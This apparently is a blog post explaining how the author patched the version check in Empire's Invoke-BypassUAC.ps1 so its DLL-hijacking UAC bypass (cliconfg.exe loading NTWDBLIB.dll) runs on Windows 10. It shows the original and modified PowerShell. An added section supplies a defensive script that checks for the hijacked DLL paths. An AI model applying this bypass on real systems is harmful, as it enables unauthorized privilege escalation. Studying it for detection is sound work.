The guys on the Empire team have since added support for Windows 10, and thus this is no longer necessary.
So I was testing out Empire the other day on a Windows 10 box, but kept getting an error message when trying to bypass UAC on Windows 10:
So I took a look at the script that was running under /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 and found this:
    # Build a "Major.Minor" version string for the running OS
    $OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

    if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
        # windows 7/2008
        $szElevDll = 'CRYPTBASE.dll'
        $szElevDir = $env:WINDIR + "\System32\sysprep"
        $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
        $szElevExeFull = "$szElevDir\sysprep.exe"
        $szElevDllFull = "$szElevDir\$szElevDll"
        $szTempDllPath = $TempPayloadPath
        Write-Verbose "Windows 7/2008 detected"
    }
    elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3")) {
        # windows 8/2012
        $szElevDll = 'NTWDBLIB.dll'
        $szElevDir = $env:WINDIR + "\System32"
        $szElevDirSysWow64 = ''
        $szElevExeFull = "$szElevDir\cliconfg.exe"
        $szElevDllFull = "$szElevDir\$szElevDll"
        $szTempDllPath = $TempPayloadPath
        Write-Verbose "Windows 8/2012 detected"
    }
    else {
        # Any other version string (including "10.0") lands here
        "[!] Unsupported OS!"
        throw("Unsupported OS!")
    }
There it is, that dreaded “Unsupported OS!” error. It looks like it's doing a version check, but not specifically including Windows 10. So let's change that:
    # Build a "Major.Minor" version string for the running OS
    $OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

    if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
        # windows 7/2008
        $szElevDll = 'CRYPTBASE.dll'
        $szElevDir = $env:WINDIR + "\System32\sysprep"
        $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
        $szElevExeFull = "$szElevDir\sysprep.exe"
        $szElevDllFull = "$szElevDir\$szElevDll"
        $szTempDllPath = $TempPayloadPath
        Write-Verbose "Windows 7/2008 detected"
    }
    elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) {
        # windows 8/2012/10
        $szElevDll = 'NTWDBLIB.dll'
        $szElevDir = $env:WINDIR + "\System32"
        $szElevDirSysWow64 = ''
        $szElevExeFull = "$szElevDir\cliconfg.exe"
        $szElevDllFull = "$szElevDir\$szElevDll"
        $szTempDllPath = $TempPayloadPath
        Write-Verbose "Windows 8/2012 detected"
    }
    else {
        "[!] Unsupported OS!"
        throw("Unsupported OS!")
    }

In the original code on line 555 it was looking specifically for Windows 8 or Server 2012. In the modified version I added a check for Windows 10 as well.
After modifying and saving the code, I ran the command again, and this time it worked!
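Both branches of the check above set $szElevDllFull to a fixed path under %WINDIR%\System32, so those two paths are something a defender can look for on a host. The following PowerShell is an added example, not part of the original post or of Empire; the function name Test-ElevDllPath and the assumption that neither file is present on a clean host are mine.

```powershell
# Added example: defensive check for the two DLL paths the module builds
# in $szElevDllFull. Test-ElevDllPath is a hypothetical name.
# Assumption: on a clean host neither file exists (CRYPTBASE.dll normally
# lives in System32 itself, not in System32\sysprep). Legacy SQL client
# installs may place NTWDBLIB.dll in System32, so a hit needs triage.
function Test-ElevDllPath {
    [CmdletBinding()]
    param(
        # Overridable so a mounted disk image can be checked as well
        [string]$WinDir = $env:WINDIR
    )

    # One entry per branch of the version check shown above
    $candidates = @(
        [pscustomobject]@{ Branch = 'Windows 7/2008';    Path = Join-Path $WinDir 'System32\sysprep\CRYPTBASE.dll' }
        [pscustomobject]@{ Branch = 'Windows 8/2012/10'; Path = Join-Path $WinDir 'System32\NTWDBLIB.dll' }
    )

    foreach ($c in $candidates) {
        if (-not (Test-Path -LiteralPath $c.Path -PathType Leaf)) {
            # Expected result on an unaffected host
            [pscustomobject]@{
                Branch = $c.Branch; Path = $c.Path; Present = $false
                Signature = $null; Signer = $null; CreatedUtc = $null
            }
            continue
        }

        # File exists: collect what an analyst needs to triage it
        $file = Get-Item -LiteralPath $c.Path -Force
        $sig  = Get-AuthenticodeSignature -LiteralPath $c.Path
        [pscustomobject]@{
            Branch     = $c.Branch
            Path       = $c.Path
            Present    = $true
            Signature  = $sig.Status
            Signer     = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
            CreatedUtc = $file.CreationTimeUtc
        }
    }
}

Test-ElevDllPath | Format-Table -AutoSize
```

A row with Present set to True and a Signature other than Valid, or a recent CreatedUtc, is the one to investigate first.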
Here’s a video of me doing this start to finish. As always, if you have any questions feel free to drop by #infoseclabs on freenode.
Video:
https://www.youtube.com/watch?v=Q5NOKJhU7TA&feature=youtu.be